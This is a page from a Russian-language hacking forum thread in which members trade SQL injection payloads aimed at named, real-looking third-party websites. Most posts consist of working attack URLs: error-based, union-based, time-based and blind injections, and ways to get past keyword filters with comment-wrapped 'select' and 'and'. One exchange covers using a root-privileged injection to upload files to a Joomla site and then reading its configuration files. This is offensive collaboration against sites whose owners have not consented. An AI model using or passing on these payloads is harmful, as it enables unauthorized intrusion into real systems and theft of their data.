Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Подскажите, как в данном случае посимвольно подобрать имя базы данных таблицы через оператора CHAR
    Code:
    http://ukrcrewing.com.ua/agency%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Вы уверены, что вам надо перебирать именно так, если возможно решить задачу более-результативным путем?

    К примеру получаем вывод имени базы данных через error-based, но немного другого типа:
    PHP:
    http://ukrcrewing.com.ua/agency%27or%201%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20--%20
     
    #22462 randman, 1 Sep 2013
    Last edited: 1 Sep 2013
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Интересная SQL
    Code:
    seafarer.od.ua/?page=study&course=[COLOR=Red]2+order+by+7+--+[/COLOR]
    Но при операторах UNION+SELECT выдаёт ошибку будто кол-во столбцов неверно.
     
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 103 group in /var/www/lesozavodsk/study.inc on line 11
    PHP:
    http://seafarer.od.ua/?page=study&course=2+union+select+1,2,3,4,5,6,7+from+rdb$relations+--+
     
    #22464 randman, 2 Sep 2013
    Last edited: 2 Sep 2013
  5. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    нужно обойти фильтр не понятно на что, толи TABLE_NAME; INFORMATION_SCHEMA
    Code:
    http://www.web-compas.ru/c.php?id=-34%27+union+/*!select*/+1,version%28%29,3,4,5,6,7+--+
    на select вроде обошёл
     
  6. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652

    Мысль у тебя правильная:

     
  7. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Точно, мне показалось, что дальше не прокатит .. :)
    Я вот ещё нашёл
    Code:
    http://tochka.cn.ua/index.php?cat=0%27+order+by+9+--+
    http://www.autoonline.com.ua/news/index.php?id=4736+order+by+9+--+
    но при UNION+SELECT = показывает обычную страницу даже есть кол-во столбцов я увеличу.
     
    #22467 Unknowhacker, 3 Sep 2013
    Last edited: 3 Sep 2013
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Здесь time based
    http://www.autoonline.com.ua/news/index.php?id=4736+/*!and*/+/*!if(substr(version(),1,1)=5,SLEEP(5),1)*/+--+
     
    1 person likes this.
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    мммм,зачем тайм..

     
    _________________________
    #22469 HAXTA4OK, 3 Sep 2013
    Last edited: 3 Sep 2013
    4 people like this.
  10. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    HATA4OK, спасибо, но я уже сделал по другому.
    Code:
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=-37+/*!union*/+/*!select*/+1,2+--+
    Мне не даёт покоя эта ссылка, но как я не крутил не выводится номер столбца -(
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    И не выведешь. Тут слепая скуля.

    Кстати тут удобно использовать метод more1row

    Смотри сам:

    Code:
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]4[/COLOR],1,(select+1+union+select+2))
    
    [COLOR=Yellow]No error[/COLOR]
    
    http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=[COLOR=Yellow]5[/COLOR],1,(select+1+union+select+2))
    
    [COLOR=Yellow]Error[/COLOR]
     
    _________________________
    #22471 BigBear, 4 Sep 2013
    Last edited: 4 Sep 2013
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    А тем более с четвёрки не вытащишь -(
    Кто может сказать, что за реагирование на *1
    Code:
    http://pereprava.com.ua/index.php?id=1*1
     
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652


    http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1)
    http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3)

    Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Очередной фильтр SELECT
    Code:
    http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
    но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...

    Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...

    Возможно такой синтаксис:
    PHP:
    130++div+++((5)+&255)+
    Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
     
    #22475 randman, 5 Sep 2013
    Last edited: 5 Sep 2013
    1 person likes this.
  16. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
    зы /administrator/ 403, не залиться
     
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...

    Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...
     
    2 people like this.
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.
     
    _________________________
    1 person likes this.
  19. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Можно ли что сделать с этой уязвимостью?
     
  20. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
     
Loading...
Thread Status:
Not open for further replies.